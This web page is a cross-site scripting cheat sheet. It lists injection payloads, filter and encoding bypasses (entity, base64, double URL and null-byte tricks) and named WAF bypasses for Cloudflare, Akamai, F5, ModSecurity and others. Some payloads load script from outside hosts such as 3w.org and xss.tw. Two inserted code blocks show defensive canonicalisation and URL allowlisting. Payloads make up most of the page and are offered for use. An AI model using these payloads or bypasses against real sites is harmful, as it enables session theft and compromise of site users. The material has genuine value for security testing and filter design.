XSS command summary

1: Normal construction mode:

1. No filter, write directly:
<script>alert(1)</script>

2. Plain truncation (close the existing attribute and tag first):

"> <script>alert(1)</script>
'> <script>alert(1)</script>

3. Without < > angle brackets:

" onmouseover=alert(1) (followed by a space)
' onmouseover=alert(1) (followed by a space)
' onclick=alert(1) (followed by a space)
" onfocus=alert(1) autofocus="

4. Inline frame (iframe) injection:

"><iframe src=javascript:alert(1)>

5. Hyperlink injection:

"> <a href="javascript:alert(1)">loophole</a>

6. The parentheses in alert(1) can be replaced by backticks (`); / can also be used.

7. When () and backticks are filtered, the following can be used:

- <iframe srcdoc="<script>parent.alert&#40;1&#41;</script>"
- <svg><script>alert&#40;1&#41</script>

8. If there is an annotation, it can be used or <! ---! > bypass

9. The str_replace() function is case sensitive

10. When a blacklist is used, URL encoding and other encodings can get past it:

javascrip&#x74;:alert(1)
javasc&#x72;ipt:alert'1'

11. Comments (/ /) and line feed / carriage return (%0a/%0d) can be used to get around specific restrictions (for example, when certain parameters must be present or spaces cannot be entered)

12. Externally hosted XSS script:

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

13. IMG tag:

<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#x6A&#x61&#x76&#x61(hexadecimal encoding)&#x58&#x53&#x53&#x27&#x29>

14. Embedded tag:

<IMG SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');"> (embedded encoded tag)
<IMG SRC="javascript:alert('XSS');"> (embedded line feed / embedded carriage return)

15. Double open angle brackets:

<<SCRIPT>alert("XSS");//<</SCRIPT>

16. BODY image:

<BODY BACKGROUND="javascript:alert('XSS')">

17. IMG DYNSRC:

<IMG DYNSRC="javascript:alert('XSS')">

18. DIV background-image:

<DIV STYLE="background-image:url(javascript:alert('XSS'))">

19. javascript link:

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A> 

20. embed:

<embed src="javascript:alert(1)">

21. video:

<video onerror="alert(1)">

22. JavaScript accepts Unicode escapes, hexadecimal escapes and octal escapes. In addition, redundant escape characters inside a string are ignored.

<script>a \u006cert(1) ;</script>
<script>eval(' a\u006cert(1) ');</script> 
<script>eval(' a\x6cert(1) ');</script> 
<script>eval(' a\154ert(1) ');</script>
<script>eval(' a\1\ert\(1\) ');</script>

2: Bypass mode

1. Double URL encoding
Encode the % of a URL-encoded character as %25. If the back end URL-decodes the parameter a second time, or URL-decodes on output, the WAF can be bypassed.
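
Why this works against a filter that decodes only once, and the canonicalize-then-check alternative, as an added example (not from the original page). MAX_LAYERS, BLOCKLIST and the function names are assumptions; the function is assumed to receive the raw parameter value as sent on the wire.

```javascript
'use strict';

const MAX_LAYERS = 5;                    // assumption: bound on decoding passes
const BLOCKLIST = /<\s*\/?\s*script\b/i; // deliberately simple stand-in for a WAF rule

// Percent-decode until the value stops changing; report how many layers came off.
function canonicalize(raw) {
  let value = raw;
  let layers = 0;
  while (layers < MAX_LAYERS) {
    let decoded;
    try {
      decoded = decodeURIComponent(value);
    } catch {
      break; // a literal '%' that is not an escape: value is already final
    }
    if (decoded === value) break;
    value = decoded;
    layers += 1;
  }
  return { value, layers };
}

// Compare what a decode-once filter sees with what the back end ends up using.
function inspect(raw) {
  let once;
  try { once = decodeURIComponent(raw); } catch { once = raw; }
  const { value, layers } = canonicalize(raw);
  return {
    canonical: value,
    layers,
    singleDecodeMatch: BLOCKLIST.test(once),
    canonicalMatch: BLOCKLIST.test(value),
    // More than one encoding layer has no legitimate use here, so it is rejected outright.
    reject: layers > 1 || BLOCKLIST.test(value),
  };
}

// Samples: the first string appears on this page, the other two are constructed.
const SAMPLES = ['<%252fscript>', 'a%20b', '100%25'];
for (const s of SAMPLES) console.log(s, inspect(s));
```

The rule is applied to the same form of the value that the application will finally use, and any input that needed more than one decoding pass is refused regardless of what it decodes to.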

2. base64 encoding
When the WAF does not block < > but does block script and onXXXX, base64 can be used to bypass it.

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYmFzZTY0X2lmcmFtZScpPC9zY3JpcHQ+"> 

3. HTML entity encoding bypass
(1) Explanation: entity encoding was originally introduced to avoid problems such as a double quotation mark appearing inside a double-quoted value in the input data, where the browser would treat the quotation mark you entered as the closing partner of the earlier one and end the value prematurely.

payload:

<a href='javascript:alert&#40;&#39;123&#39;&#41;'>hello</a>
<a href="j&#97;vascript:alert&#0000040;'123'&#41;">hello</a>

tip:
(2) In fact, the JavaScript pseudo-protocol code in the tag does not need to be wrapped in double quotation marks.
With the eval function added (eval understands \x hex, octal and \u Unicode encodings):

<a href="j&#97;vascript:eval('&#;\u0091\x65\x72\x74\x28\x22\x31\x22\x29')">hello</a> 

(3) If the page directly echoes the input, HTML-encode first and then URL-encode:

<svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
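
The entity-encoded javascript: links above (and the href variants in part 1) are decoded by the browser before the scheme is resolved, so matching the text "javascript:" in the input is unreliable. An added example of the allowlist alternative, not from the original page: parse the value as a URL, accept only known schemes, then encode for the attribute. The origin app.example and all function names are assumptions.

```javascript
'use strict';

const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);
const BASE = 'https://app.example/'; // hypothetical origin used to resolve relative links

// Encode for a double-quoted HTML attribute value or a text node.
function escapeHtml(s) {
  return String(s).replace(/[&<>"'`]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// Return a value that is safe to place inside href="...".
function safeHref(userValue) {
  let url;
  try {
    // The URL parser lower-cases the scheme and strips tabs and newlines,
    // the same normalisation a browser applies before following the link.
    url = new URL(String(userValue), BASE);
  } catch {
    return '#';
  }
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) return '#';
  // Encoding '&' last means any "&#97;" in the input reaches the browser as literal text.
  return escapeHtml(url.href);
}

function renderLink(userValue, text) {
  return `<a href="${safeHref(userValue)}">${escapeHtml(text)}</a>`;
}

// Samples: values taken from this page plus constructed benign and newline cases.
const SAMPLES = [
  'javascript:alert(1)',
  "j&#97;vascript:alert&#0000040;'123'&#41;",
  'java\nscript:alert(1)',
  'https://example.org/a?x=1&y=2',
];
for (const s of SAMPLES) console.log(JSON.stringify(s), '->', renderLink(s, 'hello'));
```

The entity-encoded value does not parse as a javascript: URL on the server, so it is resolved as a relative link under the base origin, and the attribute encoding keeps the browser from decoding it back into a scheme.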

4. When /script is filtered

<%2fscript>

<%252fscript>

<%252fScRipt>

<%252fScrIPt%20>

<%252fsCrIpt+ipT%20> 

5. When parentheses are filtered
throw can be used to bypass the filter:

<a onmouseover="javascript:window.onerror=alert;throw 1>

<img src=x onerror="javascript:window.onerror=alert;throw 1"> 

6. Bypass with null bytes

<scri%00pt>alert(1);

</scri%00pt>

<scri\x00pt>alert(1);

</scri%00pt>

<s%00c%00r%00%00ip%00t>confirm(0);

</s%00c%00r%00%00ip%00t> 

7. Split and then combine

<script>var a='h';var b=':\/\/';document.write('<script src="'+a+'ttp'+b+'xss.tw/xxx"><\/script>');</script>

8. Bypass using ASCII encoding

<img/ \/\μ src=x onerror=alert(1)//>

<img src=\x17\x17 onerror=alert(1)//>

<img/\%20src=%17y%17 onerror=%C2%A0alert(1)//> 

9. When parentheses and semicolons are filtered
Curly braces can be used to separate statements, with the onerror assignment placed as a whole inside the braces. This avoids the need for a semicolon:

<script>{onerror=alert}throw 1337</script>

3: Common WAF bypasses

WAF name: Cloudflare
Payload: <a"/onclick=(confirm)()>click
Bypass technique: non-space padding character

WAF name: Wordfence
Payload: <a/href=javascript&colon;alert()>click
Bypass technique: numeric character encoding

WAF name: Barracuda
Payload: <a/href=&#74;ava%0a%0d%09script&colon;alert()>click
Bypass technique: numeric character encoding

WAF name: Akamai
Payload: <d3v/onauxclick=[2].some(confirm)>click
Bypass technique: event handler missing from the blacklist, plus an obfuscated function call

WAF name: Comodo
Payload: <d3v/onauxclick=(((confirm)))">click
Bypass technique: event handler missing from the blacklist, plus an obfuscated function call

WAF name: F5
Payload: <d3v/onmouseleave=[2].some(confirm)>click
Bypass technique: event handler missing from the blacklist, plus an obfuscated function call

WAF name: ModSecurity
Payload: <details/open/ontoggle=alert()>
Bypass technique: tag or event handler missing from the blacklist

WAF name: dotdefender
Payload: <details/open/ontoggle=(confirm)()//

Keywords: Web Security

Added by zypher11 on Sat, 20 Nov 2021 21:22:44 +0200